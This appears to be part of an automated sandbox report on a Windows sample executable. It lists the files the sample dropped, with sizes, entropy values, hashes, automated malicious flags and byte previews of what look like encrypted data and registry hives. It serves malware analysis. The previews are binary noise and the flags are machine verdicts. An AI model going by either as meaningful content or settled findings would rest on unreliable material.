              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.269026508053897
              Encrypted:false
              SSDEEP:6:0V8kkRfFCHi812i1pUhNYZh/6oo9ke+IQDgLGQ7eioJRo7dU33ukIcii96Z:FIiy2i1pPZpMGFk7go+ukIcii9a
              MD5:E776C7D0419903379A84D3AE6D8DCFDF
              SHA1:94054D7F3DBA450786AB96CC4165D2E7BED0617D
              SHA-256:1E9CBE9D7F23A2F7A6C6F1B4FB1A36EFCCB998596F375AE83702726E31D275C9
              SHA-512:C6AEC1E0B02CBEA5B7F098936F67F16A67D64ABDFFF79F9C3F9674AC96398787D2D0504E643BF666BA88B01EA5C74043E0C71C395FD74C701468B2BA87149564
              Malicious:false
              Preview:CMMM T.).8.z....z.w.....~&].....*...[.U.F.i.z.^f...e:{c............1...O.?..#ss.......]^...Zc....^KJz..r4........D.dw.?v....Q.w......9q..S..Z.2.yH5..9.=.w3.sF...w.y..i.w.tm.8".....6...z...\LQw.....#......k<-..p..s........5s.(...X........q.......QbC.{.c....X....I%..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.344318738339881
              Encrypted:false
              SSDEEP:6:8uoDqNAeRIkhsPYq2RD/4esG9nfwtGLDfxUTZhaFeRQvAH+fDFwC3ukIcii96Z:8uomN9pGV9onfwwOtItvpDFwqukIciik
              MD5:85D7AAEC9CDB6350957BE869E886B12F
              SHA1:8CC75A5D5AF369A58335458884B8F2DB99AE9FD5
              SHA-256:1C8D81A735F2B89393C7ABF1564AB1BC286D32EBDECCAF7F3B93629A52C86663
              SHA-512:6275A778BE24497B12E38C0424F9CB6D2BCB17D7D2D8F429586F9A1FBA6A441FDC00023C485A2FA7AE87AC107E21234C93AC04AB1AE2E6E7B7454A91985F0B19
              Malicious:false
              Preview:CMMM ..g...W.....tP4C.)h.H...E..H-(...._i]~_.^......DI.<.T.^.O.ao.......A%..Q......6bA..C[....m.....@}.A.F..T.,k.Ux.b...R.....g..^..z;.T1.\..<..K.?......5..((.{^}.1.....d..o)..?:..............4!...nE.a..W..'.R1@.%Pj.........c......r.9.$.W..h.+..&...I.a.K..]..Mtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.31775512100936
              Encrypted:false
              SSDEEP:6:/4qIKehD6HrWL1VvuxUrWt1+JJU86D0ZciLpYiRCI27CgLfEd33ukIcii96Z:/4/K+FJVJrWtMjD6D0ZnyikUGfEdnuk6
              MD5:2AC9CE99AFC7FC0074A5FD8E5B879C0E
              SHA1:159E91B7078A818E67BF30F917FF28A44391B1EA
              SHA-256:BA19D9CC1CA7F565E59867AC91CD226A73B6493EA4051C1AEB0B5996CAA35FEA
              SHA-512:1A4BA1857F890B801A49D5D1659E580CC65C425E9783348BAC41772C4E9FC6D6B931A9074AD23B36E9DF0AD5F105F0FEF5C2E783FCD53E69B2AA4259548E921E
              Malicious:false
              Preview:CMMM `bhy....?4"..t.7\.....1..@.C.S..u.U....J..N.~V.cj......7.6\....:}.%..u....j.#....5...qR.?*.v.-.BH..n..wG.U..-A......$.^..>.<.M...;..!.&`..E.4....:..'.....g.O!Ir.}....].!v7......H._..<...G[...D.cL......j*D......`.|!.KVT......a:|.A0...\.Yu.. (.Q.4@..(.Upem...V".|..V.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.32368515747979
              Encrypted:false
              SSDEEP:6:LfMwIWByTjzoUdnUoA357HDdWdOiJDPjO4dWakPP3ukIcii96Z:tByTj9dxANBWIiJDPjjsPukIcii9a
              MD5:6A3E183D6D959D8C3B6CF3D71C39926D
              SHA1:A65C0136D4E03B4A73D236C076B82AABC700D5F1
              SHA-256:D804E8F3CDCF0BFBE7BD5B6F5FF169E0B2FA55B6EEC6B2CAE61E3F217A3D30F1
              SHA-512:3A31CCE762E78CCDD6105DC70020D0A6F0FE16B3B23F079D0817FF1AE4971308EDD6F8E247C5F8FD9290526EC44942C6B24D1693B7D89C9046FE4232E219E705
              Malicious:false
              Preview:CMMM ..OS..a:..@]..i...U...d<..*...q.dO..Z....)...K..9...b.b_.o2.M....?.../._B..%..o6\.<....W....i.%6 .r.u.Uc...D...j....~z.H..g..V...O... .RU...}h?F..`.A.D7{t..+&yM.....ER.)...L....C.Z.....K<.|e..k.w6.~"..K.[.<..<5..D,S....^.O....\.]...R........P..?mp...X..|.W..9.b....4.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):358
              Entropy (8bit):7.346031526194873
              Encrypted:false
              SSDEEP:6:94RFLglpdVqoXyyXeGDhsOLcIv9zOE0e0riG7ZaIP3ukIcii96Z:ywH9/eGD75vEE1lSaIPukIcii9a
              MD5:9C4416CA5AA6E8C105B0799CC158657C
              SHA1:DCC21260AD254D4533E0EFD176C9A011E9C3CAF0
              SHA-256:540AFC4F93EA1B1FB6CA5F4D57A3263B984501378613C5A8614B49BB68BEAB1C
              SHA-512:4011EEFDF98ABD019441670F14F92C6707128D0292833AEA79BF5F74AA09163817B7A9E7CE7C7B8CD0AA33774D52C8A80EF3A71B0364F4D568134C8047BA27CC
              Malicious:false
              Preview:CMMM 6.mW.#.i.W.N..O.....Z8]...y....N5..|....d.Be...:..lG..X......+k......G.+ KN:;.Wma..z.b.?....,..QQsF......x%...,52.n./X'8.3x.Y.&..5..Y?...h..Y\...d....^y......[.....F......v........;..x.......Y.s.|.j*...y....o..........K..7.a......$....H.. X+1G.a..15...AD....,..8tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):64281
              Entropy (8bit):7.997203695537066
              Encrypted:true
              SSDEEP:768:OqrK3sV5XeIIEXNg9ny8b3/hZzo8lpXJna3Pmrf3MFQjKAM1r4aQ5FJ5c+TCdRMX:/K8Jg9yMPRBljKRr4J5C+kMjm9c
              MD5:803D95B376D8AE166CA5A21167091A31
              SHA1:F1F32C0152B1E839F97CC00460C097A0F3AD0500
              SHA-256:33D2DE0EEAF77CEA6737CD2DD490CD8B217B0E01709B1440267AEAC522B28664
              SHA-512:1D8DDF9EAB9559062517E8CFAEF93B288B513FF53CE0ED96F4C8B1993E2519E82E0947FB5939059F13C098FD5252AB2C550CB2A1B7530CFD29DF6CAA4BA5375D
              Malicious:true
              Preview:<?xml......>.........wZ.....HmE<m.Y..J.V..X.{.gM+^0u}..[...Gx......!.!z.Gz5.!o.Yx.....}..R....P....9sV....0...P.c4.H..3.1UAH}.......l..2b.....x..I.....q..`?..E.c..o.t.c,...I.,.g=.5H`..;.4HM..#6w.b7...4T..?....&.a.....V..n*Y..Y.r.vo..._...D.....?}..;..^g0MJ 1.C...C".o..ta\=.....Qz0.YB=}^....o........6<..........W..<........c.&..jQ7...$/B..+o..!...s.H!..g..\...Z.SS{rx.[..Z.1......R.I=&.e.7.%......x........-..3F.qs..3$........J....n..E.XS.....R..a.+..F....?........A...:..p....[..Bnm..J..U..t..&9....<.4...}.................".qY3..}..D..P..VA.......I..t...y.....wDe`.T..\B.p..D...a..V>b..:..j.`.B1.).i.r...A}..R....a.$....Ml.`.%R.;..=~.".qy]4p.WPdWZ.%Y)IA...}.M6.|c.7...>.....j.}u...`.{...FX...G.....F/>.0m.H&z......\.......e...S..$...3W{p....:hQ....oR`>...ts..N...^.p..J.1...+.....+....lc.z.6I3:...EU..)...M..Y....`.Y.b.%.....}..1.......;.....,..i.K....c...wH.|7..)..]S{)5t..ByD&.u........i.H,jRW...>..Px.1.....i@...O.q*=Pa........rY.O.#....p...1.)..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9797885235544515
              Encrypted:false
              SSDEEP:192:gkoHLpt++rGN3xEgdrQZ7yfiQdploVfqu8Q8F/d:b0LxSxE+rMufiQdk9qu8Q+
              MD5:AE83A70930075658E805642B3CBF614D
              SHA1:1CD5D93097B980399D1C72250A1BAEC864D381F8
              SHA-256:C5F47E8E6EBD6CA14354076A18CE8C5980B53A0C71AC6B9DCCFA0170E9C8AAFB
              SHA-512:FB905413DCB0C8FB1598A83D14390418077F8197A041EBA50EDBF38BE9E5017BE66E885A3C0F842C3E62FD2B330BADE06FD985EF21F39775C4EE0D56B52CF603
              Malicious:false
              Preview:.p.|.A.L.m.K...K.AK%_.k.%.;..]..e..S..N....F.>...k..1....>Q..K.X.1."..H...........Vi.)....U...7.W.F...3d .[...V..g....u+y..y......v`.@.[....{.V.1....=.uyN....7..V......F.......X......T.*.].[..s. ......A..t..;Q...P.xz4M.._.I.G....65`..O........J.`j....W%..'..M..._..0...v.yr."T......ps..-.....<T.^...%s..f..q....Ry@.Y............rk.q(..H...AOCN/..(.~.!...a!...>}..&....&.!...K..E&...'?.2.6.Y......j.|.h...`..O...x.....}|...+.=%/|C.4.o..9*..T.x17..~.......DftA.....?Vd..V.-..&.oW@s..Fu..9^^Z..m>|b>HPB...Ea......y\..m!*r.g..m../^E|..c|...U.....&L..f.'6$E...d=...=..aj.z"...D.d...{[v.ir.F.29.y.0=..6.zl.@N.....H..z.3.K.ok..D.$.....s.+z..F.Q.K^G..t...U..!g.......,.<..._.~^|..Jr.q0....1M]6O.3..#.....6...K.].V..fm.=r..J..... A?....\....=.l.K.[......%....UT..\.......X!.xG.l..*!.......3)6=..Y...^.U.....1..r.N..i.E.........;w.bC...G....._..]..).AS.[j..^...l.zi..Ie.~....SF...w.b.5.!v0..\2.Y...'....PL.ca..-......>.X.`5D@.FP-..U..i.+..1............~)@.D_-.W
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):7.0140957244222095
              Encrypted:false
              SSDEEP:6144:JkBhjDQhq9l1FSTyQY5OPdaFRmwBJeQNy6tsM0P8ATX1BK8O2JzJ:KjDFqYAo2yy3
              MD5:408BCECBDD80D12B791F085E3DAA744C
              SHA1:090E8C5C52BC2E5488CDD10702F59531ED614B6B
              SHA-256:5CE2EAAFFE48D3CABEC56D7D874AD3B0524084C938D4286AFD13B1A50B52049C
              SHA-512:13432F763FA4499BB8B4507458653D9F1EE46387448481ADF2D90607DEE86A5B7E481E7BCE830C6143391ED4DDA73BE25B7446C566FCA9F2CC189143162EE888
              Malicious:false
              Preview:w.I`.|........N.O.O.......M....8...G...9..#:.r2...e.-.!.R.^..&.L.J.Xp...>..[...~"T...."!.F.....T|a..h....Y_8..G..m.{.^.A.H.uaf.C...Wh.'!.P..H....L1.OZ.f..6..._..Ma$.._*.V;......KY..d.f.NjEI.O7..MH.ps. .C....B..4DO4x$...i...V.+...n..K..^.yy.4..Y.k.P&TK...@.`.>iy,...t^..~...`.{.....IP.....KYB.)a2..N.....l.......2... ...(....hh....z..5..A..&.xJyI......V...rTV.H..r!4......d..y..H..`P...$...{.d..4-...iC..4..H....7..Mt'u.......+....!..(#.\.RFRO.3..uH.4R<.w^^S...U.K.^..F.......;.......KoQ../\.{0."..gC.;...*..f."....a...!.3......p..s.UF>..c.%.Z.e...v....Oc...b4A...C[.>.C.....73lK'.b....si..H...DW1..`....oG....P..[......p.......~..........7h...9......ey...;.*..rF...._.....j...,mA.C..1.......x..D..L*.]././.gs....p\._U.&|.f.....?g.PB.z'7..G...k....=......9..{.........:.A.4....P.g..|.....F.........d......:,..V.P.D.$..Zn.#N\.S+..~... .d..wpT..;....h..Wc.,.].x..{.....K.g...QK....O..0B...].0.x..d.R.<*.=...A...H.......f.>s...b../.v..-<.........L$..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.2081746516060665
              Encrypted:false
              SSDEEP:3072:S0jpP4DilR0JAROK/jRwlEmHRNlBrGiyNN1NTAHkK2aytrLp6Hv:wKmCX/jRwlEmHRNrPyxNXtXMv
              MD5:F3365232190D724BF98ACAA026A62A12
              SHA1:A487424D3F79E35F7D12708C511BAAE58466B3E3
              SHA-256:FCDE287CA8357C1D4F947728B8867C475B6EC263865FB238CB1C0918469A4826
              SHA-512:22DAC7035DDE67D01CFC3CF8018A100303BFE98D9F5219B1BBE5155A1D82421073516905BD2FE9D82B6206E9BE26F8720CB318254D7E3FD7F524A565E61EF7A9
              Malicious:false
              Preview:.....>$.,...w.A...;...t3|.o.9b@b.hQ.".W.[x[.....0-._v.R..q.S.#..l..2.\.w........&.,J..*.v.:3......V.....:U.n.........kRS...no...+......;..2......27v.....qb.4.|...D.6n.'....,....m....,......r.(9x.!.R...x..w.P......fk.2)]...f..2.$..tT._....`...]@....sG..s....w...42....)..D(%h.`...aq..Y$.0.....,..G>3.m.....im..M%.......K."'....`.'...=.I..9c...`..c...n.H....$\..(...p.]....yv.!..r...R.Co.f...}...a..f..Be....*..f.9.n.%......LF.D9... VA.{C.+.]....$F..:3A..3z.)'.../;M...g...'.l(~..(...K.Q....Z9...S.`.......B.W.o.[Rd..C........f.,t.j......2>.5s..%.GmG...........>......[.;..{..]t.$#q.;....3O3....<[@.-..>C[.n!KFE..*.r....E...H.....3.x...7.B..../e.V.F-.A.Q...K._...nE%pS....{....o.R\.(og.N.8.2......0KUa.qs..C...$Lh..C0.@G..W.r.o.G.dd..Q.$...b........Ri..z>&...&.z......ih.wp.n.....}....J......NEV...O..B....C.&... ce...].K..s."..&G..m.n.|...;WB.$V.........g.0.S......j..j....`.4J...gs..?.@V.Z.6=..H..Yh+d/f._I.........l..w.]KZZ..-H>O...9.z<..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.207994898153344
              Encrypted:false
              SSDEEP:3072:o6dNqxQXZpn4rGaohs/9hZQNiCHpi3XRQRyvb53VUhk0r:o6HqQD4L9h2JEXEyvb53VUVr
              MD5:BC1283FA687464CC0409090BBDC433E5
              SHA1:086ADFD29306950D63BF0F4C372A301893ADC01E
              SHA-256:D505820979CCA37FA663329C4F251BDABBE94167B39AF7787CAA7BA7DD7E2200
              SHA-512:DCD44368A7549E1BFDCE1F81424DB86A3B513BA51EAB0C78889A277D43470B3D3354AAF2AA0BA845560625041C9A75E0BA44F4FB434B6596C6E7F68D40F9E1C6
              Malicious:false
              Preview:.....d~....f...f7...........]...q.d.4..L.9.AFS..&...]..RV..O...!'[...V....65.w..w2..!.@..D.K%..|.... .L..l4?\.(..U..q.pB./..)].Z.5.._..#&.'kS..[N&].9.v[....$...+.....!:..?.Y..i$1..~K.t!Hp.9....c'..A.._.[..a........gZ7 ..SFN.T:'..kq.$..^.....6!.@......).......zk....M.`.'NW4/~8.o..~N....g..b..7.`......9f.~.............z...J..=..<..z...8Qh..xa....z.h..v.Q....H.hg..f<j.X.r.6.mh..".G..1.p...=.....<.j\.l..)3.h....ul.........a....&.....'....4R...t.eURI.W.#....3..8w..TD...'t6.r...q...._.Z.r..;..J..::..bP..2.j..iJ...s..<D......*<.m...r.K.2.M*.......C....+2.z?/.t...-..).0.WDF.0....g.x......\7U^..J."..[..r3..)...9%i...J.8.R&....g$..==..]../.U..9@........;[V..^NE...>....h.......i...W..R...#.z.....G..p...w..%.F...)umR(H..~)./..$.p...c|@.5....u..OR.<O.....7.D._...7...3%1q#r*.#.M........V.L.R{....L..{G.k...k...`QR.E....}=..).'....OD...5.....,..\...ak...H.k}....b|l..q..3w..?.gv+...O9dx.N...[.D....@.&"...6.(ciu...Y..%].,.O~\.......yy..@a....PCV.9n_.r
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):6.6637461095943475
              Encrypted:false
              SSDEEP:6144:dvcEC/f/7my6lFGZhTVSdYbbsK0eBQ6GuwlcTKcBwqGQguuleoxvTxcZxBvxdhvS:dkn/7my6l0hTVSdEglttEjxS
              MD5:EB15E0410E5C5EE141AE7EA1790B78A7
              SHA1:41FBCCBB8BDB91C433572EB3F797C512C532CCF7
              SHA-256:9BDD9FE2E8BB32E078F658A384C64E1CD8C0E1631836C61B0358A59228263242
              SHA-512:D8174E8FA3E4D59235FB41AD1E463A811EA66070C713096C7519DAB428F51ACB09C744C01946DE400F3C3DFDD67B1720478522B65EC253C887F81CFEF26275A1
              Malicious:false
              Preview:.....@d..mzl..q..O.)'L......s..qX\}...5v..PMw.%.....^..9R...Dv.....p:....w.R.;...9S'b....W...e..."...um..a..z..**t..|...VL..61..g.U?.9.U..?.<.A....q..4.p+y.?...#...r.,...?....-.x..%.<.,......p..f..9..i...g.7e.>....L..:j......m.a.A...a.}..J....Y*.O....T......"0."S&R......M;.7;C.. .S.1.SWx..q.R.<...T.8..2.k...c..aj<..A...|...`cu..uD..>.jb....%..B].U...c!..D.l:....k(.XI.>..3i...V....Hh(..........2].-k.J.wa.8?..f..|./M.@.EA6}t.k.l.4Q.m..r....'..E../B`r]x./.J.0H.n=Wd-C..^....5a$.W..P.:..g."~W9F......`..|.....o....d[.&..<...7.... /...t.M.&..s..9US.{.......F..A.4..X`...Y.yyw.E1.......r|6..=.hp.....1u..#tt.._...nf%0....#.....P..8L.....C].=..7......./X~.l.Z.:V.a.qq..e......`.3../......@......p.o..%g....(.._...y...O....".@.q. ..m.mTQ.ft`...W..M.....:..[...e.t..V..w..6Yh..H.......i..~.........f.?{+|..K-..Q.%..FWc]..7...`s?.pL..h..c[rD8.=...2.M...5F.........8k..o....z...p..)o..%.`.X..O../...%..F.%T.nX...Z('....k..\..HX.4..M/.z.r.gS..?...*k5[...z
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976488243337732
              Encrypted:false
              SSDEEP:192:d40qL6mW+kZHSDneAMymjDj7TKfgGRBBRlGnjihkLZCeujXh8IMxeQrM6CD1/:d4PU+aHSzHWDTmzbne+uaXh8hFAvB
              MD5:6FF16E18BEBE7A6DAFA7C49AF977346D
              SHA1:5FEC910EC29712FB68E20A42EF196AD18420D51F
              SHA-256:36213B41B6B91B9A8027FCE1B34FB7A229F96DFA1AFEDE9E2B0023C1DA3CC255
              SHA-512:F99ED14CCC426D403067D009E97B2A218684C409F2961035B23D4E34291090F705F80F2D66DAE813CC273AA519AA1A6F40B90EA228C6CC21E1EEF82C1B12CF84
              Malicious:false
              Preview:regf.G...64T.m<.rO..&..............k..0B}V..,.`?6R. ..Z.^@.^4......r....S..I.M.1&...K.&..!..L.Z7..c..6.J...m..%W......DKK.{..~..ps'.qs.b....e|PP..&..`....mZ..a...q...t 4.".r....i..g:.I.K.S.#..uR^....#..<..D.J{..8.....|..8....S>:KB6.Pr....{...6Wi...3...\$..P..`.w...Gr$..0.'_.i..u.fep.L.4x....(.._s[.@..A...+.6......E..qz.}o.~...=Yo....t...J5..p`...1l...M...Kf3..lgo..`}.......=!.`.r.kL....I.T.!..|...lYz...hc..v.-.6......5..n...c..zK..Z....%..u4.R..X<.63..t..cp...a8..IMN.z..B.......YM..{/sy'..T........a......b.7[A..e..q....G....q...M..]d.d1.c.Hj4.....O).nP.D..\..{...........XZj......{.r[e7...>4lZL..g.q.G..W(..B.M.......J...^...........[....!....Z...0..P/2.]....I]h.Fd[...7xB.y.._O...?.T.+......}].D...W..jW.~.N3....YH.d./..T2..Y..(\..U..z.X.....2\.@?0..,?.j..Tm.L.........e..^....=y."h.L.2a&V6......n%...f....P/ ..M.vtyF..R7{......)o.aL.z....[WP.Nh_L>s....w_.M......f........2cXDY.2cq@.t..'...X..f...g.,.E......t.e.l(..z..\'.,...Gx.pM.....\...1L.&.@
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9802088983284944
              Encrypted:false
              SSDEEP:192:QBanct7LAjq7O1cPMzyvGBo2BJoaoBX9BrtqLm94:u/7LAjP1cPeyvGBN3oaoBX3tQ
              MD5:78C238295AA17C6B77CEF1DE1FA37949
              SHA1:C1085355DB828E68A0DF6B369AB21B943545A6D5
              SHA-256:C691D5F9FAC4656B885ACE4B1EAF1A5A6C1A070E6BD608F322EEA0BD6B55918B
              SHA-512:46F294E4C9455A765589361E07DF85516225E166E880BCA8178AF61B3791AC755FA108F59EFD1F9340141BD0A9EE20F2F8655EED97692B1223F47DB8687FD366
              Malicious:false
              Preview:regf.}......7J..........8........."......+uR5jAV.........6......J.b+..."9.....",.#....t.;..&......x..q.3...c.F.B(.@Ff.d..l.]b..:...oc.h.`..y.7.m..v.i.H^...,...v/ jB....3..1.Y..B....yn..E...N...p.Jp.....6B.c/.....r.....g.F/...|eu@J...] .Q....A.$..Fn1....b..u.-...s./.m...Z..2Ws769d...2U.M.X$....%3.`..Dr.)e..n6.'.dm....[..1...Ig....[....Y...J.4..h.osi.Q....U@... J.[~).o..l06. .W2.m.|.k......Wx9x.....Dx;M>.;.`#)9..c.{#1/.y.\<.t...0.XS.bdB....[6..5..$.........+.Dx.....Q.D.]F..A#.....(N..s.3.9#,{...)...Q.p....Q.so.p......u......(...V7}.tR.I.r.R.&n%.....L.m...(.}....7J..r]T.q.v..*o.qXG..$<C...:.4.K.....\.............H4I!...-..@2\...E_Ga.@.w.....$Bs)..|c.$..m....o.......!=..2e.q.?..+.-..CG.....*.|.B..^v..=8."..........).YPf.. 6.......47{..2...sJ.n.(r...rV. eN)J.E....:o.wW.-c...Q...`'G.....'}..."W.r.&...M.Z...jx..}.>.).. ..I.?....k..0....._(...._W.....5k..[....*.I.?.cV.x.Q..u..S69xQ...L..7g9i6}..u..*.!.].e`w|.X%.i.R.,..y..F.p9.k.6a]VB.].....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979470355278914
              Encrypted:false
              SSDEEP:192:BU0VrARXfOFeCDrdnhx1nTBuXObYWkKuYKH8:BHrAVOFhbXBrkKuYv
              MD5:B81FE1B2CD367F62C9CD54BE91FCE5B8
              SHA1:EC97751BF47AB45E35D8416C51300821E764E252
              SHA-256:9A804FFC92E56A0D69B6E17FC95FDBDC4246FE95C7779EB98D98B1A037D7F85A
              SHA-512:4F82DDFEDEEFEEE2098C20DE1C8B417B012BC4A1AFD842EEE792375BA90B126A88E2635DB5A669B25957914D10ED4E40C996DC2F1390A0A35FE4B546E12E4EAE
              Malicious:false
              Preview:regf..t.)u.*...y..p`q.<.S\...>#.Fq.Z.?8\.3.v..m.K&Tc.jo.....a...b'^.E....c...0....73.M f..../....../.'p.Y..t.........d.-z..b60s....-,.....]..lAb.....K|o.|I.W...#..=.R.<.j.^..Y5..O..#.8{v.r.cU..#.^.p.4%T..*...O;.2>FT..[..#.7.j..<.[.?U... A..]Yd..a*..]..g.\C}...75h........V..\37._......c..7.....OI.u3b._.....xr..\...|.k!.BM.r....(H..)<r;..K6r..dDG.ZE...%H.f:6'.HI...cC...........G5..#.a.......Y..].R"..d.'..).w.v.......P>.8../..OP.@<.sf......k.Dq3.'.(..0...5...!.F...vat..ZhTiO3.~.X..u..A..j.Pv..t.\...r;..D=.RA6......U..B<....T..<4/...|......w/.U...]".7W.bm.....=.f.0..2+.\.:z.a...P.?.......h...-.e.ST....0...>.X...xZF..g..I.o...Em.W.?w....m.....r....SNo...ESd..<X...m..i......&C.kH1.m.g{D>..Z.Y~Eb..Q..w..}...N1|.1h#...j.2....I...n.QmS....T.pE..=WF...].p]._}...G.. .._...8.0...A!...`.....o...#...z.'...K{..t{=.....@.0.G%...pnN...p..a.....{bv..s........J..5"......+.A;/...2...A........&..$...)..>HS&...HG...8.-a......u......P$..\..dl.93..k.Mk....O.qG.`....>?Y..0v.B
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.97470424799644
              Encrypted:false
              SSDEEP:192:ZquvLYG2PyppfhxE3EKbOfdxEtDpQgf5e4JK+TbZP:f2P4fhxE1Ofdx0DWgnJK+xP
              MD5:EFFD98D3B4E3BB143D9649119681DE32
              SHA1:EE615AD10A88B0A4644865CEFA7B7AB06C97537E
              SHA-256:A9688B839DE2646E1B9389727B4B7F3E7BA90CF2C544C7D695085D91FE96E436
              SHA-512:9A29F1EF1ABA99E38A5B13A14DB332F6EB6656F508C1FDF45C79C0DBEE901055221C510B07633080DD41D808338D1BB487F908F3CA10E892D96BC750CF26B51E
              Malicious:false
              Preview:regf...q....>+H...B.\.....p......7'5.\...49..g.......6...^.#..mNL3..N"UK.+..`..6.L>$...8F.lt...`w8I,qO............+..CR~..R.t..'....U.W.7.F1i....Y.../..6...".R.f..........a.lbc....30...<#.y"..Q.JS...Ss3.X..7.......y'tV...G...?..9.....d3vH...X....<..^d...}|E*..t....1.....J).<.V...+..1A*.YmH.X.$%z.7.P...{...t.....Uh.+..;T.d..S....`Q.b.$n_.}zde=...Yc.Q...~L.(.....Yd..@Z........A.;....c.....[..^X`.$....[..e.. s......yl.B.H`.?g.&.*9...W..O....>.ma..m......4.R.8.i.Y.....uzu..z!qt{............EK..T..]..X.....6j.;.J./@.n9..p.o..2.LJ..T.+....'.]..5...J-Oz.....#...p@.}M.`8]......B'..X.......k....o...H....3.4.$.....J;..'m..P.z.lS.O...=>.b.,;(.8.~*..?=...X...&..-F..iq.$.|=.b.~..q...h.8....k5......t4..)..f....#.Mj.W.T...=W=<B...2y..{.a.8..'..pN.a[.-d'b...Lf]......c..a?........z........e.;..k..,O...Dd..y2.&t(.B...p{`..Ey[xFR.R.....B..<...WGYs.....S.....0D...2\=....\.KT~|.4..X...k....}..A.D..K.$.3.S.....?...J..l;.--..."f....2G"..K.x.<m..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.98004556965813
              Encrypted:false
              SSDEEP:96:LLheYUCHM4wK4jkjhtKL0c79YIli++gW6g9AJIS5M5OmEjaeRJkcYGdr1g5zt5rR:LgYUCKKu0E9YuigOMG5O5ZYbFl63m
              MD5:1BAD8592DF11B0B3CB3C8BE26C1F06D3
              SHA1:1804E97400DAF3DB3B55EE43833725706C730137
              SHA-256:B03946421CE2C22902125F9B9918EE51B98FDBDB03B587752F52E56597373EF6
              SHA-512:13BE45566E764754CF2C937791A0F5093810C2985E1F63B87A8E0184E82692A3A176D527D54A6C01BA6903FB381665DF4B1B50121993258D3AB3230241241EAC
              Malicious:false
              Preview:regf.\T.A,.....^c..M...{/.......1n...by...?.=.eR...n1.S(.}Q.0.T..K....J.uE.\Q <.....M%...6*......0....$R....^Q.|..-....{4L.....[.b.m..4.}".".xR.|.Nj(.;V.1?f..C.-....5...%........t.......&s.W..o.w.h,.j.93d.)...b..&6..l.y.<...}...;......S..[....3_/.]m4<Ug..gy.1.L.7...n+..|...KE..%.......;R.......{....3."."!l.}.4-2..0..X6..OA..s.K....,H.x.:.C.)d....J...~}..9.M%.B.Tn..G.. .'.+.J.....J.\$..S.L.v...u....=.x.C....V..t...:9.st.5z.....<.;./]9J.Z.B$V.]L...<!+..........2.;.....%QD...n..u.......}....ub...Xj9.s...9..*..)...C.>...GwSz...."Cg..L._..j)o..!+..R...A.:Q@I..... ....r...#.p.x.s...Q,.[...DL....yS..w."..P|)g......$..."..*...kgm...`......Tj.......H-.......#......'.J...D.....b...kR..o?.R..!...{..E..!...........4R.*.....p..'].....G.....w={..._.IL....y.Es."P....j..}D.i~............d.8.:.D.>X.......u;6.X...C.u.B..(/...Z.[.R&... [M....l....<7.....p..e..VN1.u..3&./.-..qE....&U.(...._....I...2..).....,(Cg....z...S.../v].8....)B..Oxo.....W..._Xg'.c
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977273554699072
              Encrypted:false
              SSDEEP:192:yAphQX36duGqPd2+ri4pdJ65QkOob9DEXH7B1fQ4Z4+QWCu:yApq/dB2rUob+XHPI4Zx
              MD5:854E41C1095B2BD84813789F9ABDF140
              SHA1:DF7DDECF9189FF90CF819352A7BCFEDF7E7FD7EE
              SHA-256:A4EA07AA19D9AC9DB00FC55E0C30A96C32BC02486294FF1F636F70366412F4ED
              SHA-512:CCAFBE22EF5467DCA23DC4ECD61A77D991AB16C63B263D793BEA5AB0FC6536AA8469943E609C88DA0C4D874FD2D01B771A45D3A1B127100B74242EF1AFBF0648
              Malicious:false
